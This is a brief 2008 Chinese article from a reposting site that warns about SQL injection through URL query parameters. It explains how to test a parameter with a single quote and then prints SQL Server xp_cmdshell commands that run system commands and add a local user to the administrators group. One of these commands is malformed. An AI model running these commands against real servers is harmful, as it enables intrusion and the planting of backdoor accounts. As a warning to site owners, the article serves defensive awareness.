安全专家:不可忽视URL漏洞

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

前些时候,公安机关破获了一家网络公司的程序被盗的案件,分析了一下,主要问题还是出在URL漏洞上。

测试程序是否存在URL漏洞,最简单的方法就是在Request.QueryString上加一个',如 show.asp?id=1 ,改成 show.asp?id=1' ,打开IE高级选项中的“显示友好HTTP错误信息”,看看是不是显示了“字符串 '' 之前有未闭合的引号”?

如果数据库是SQLSERVER,试试在查询分析器里执行以下指令:exec master.dbo.xp_cmdshell

dir c:

黑客便可利用exec master.dbo.xp_cmdshell 干任何事情了,那么利用这个指令,便很轻松的在您的系统内建立用户 exec master.dbo.xp_cmdshell

'net user cc cc /add' ; exec master.dbo.xp_cmdshell 'net localhost administrators cc /add',以后的事情就不得而知了。

注: 非法侵入他人计算机系统,可能会被处以三年以下有期徒刑。大家不要以身试法哦。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航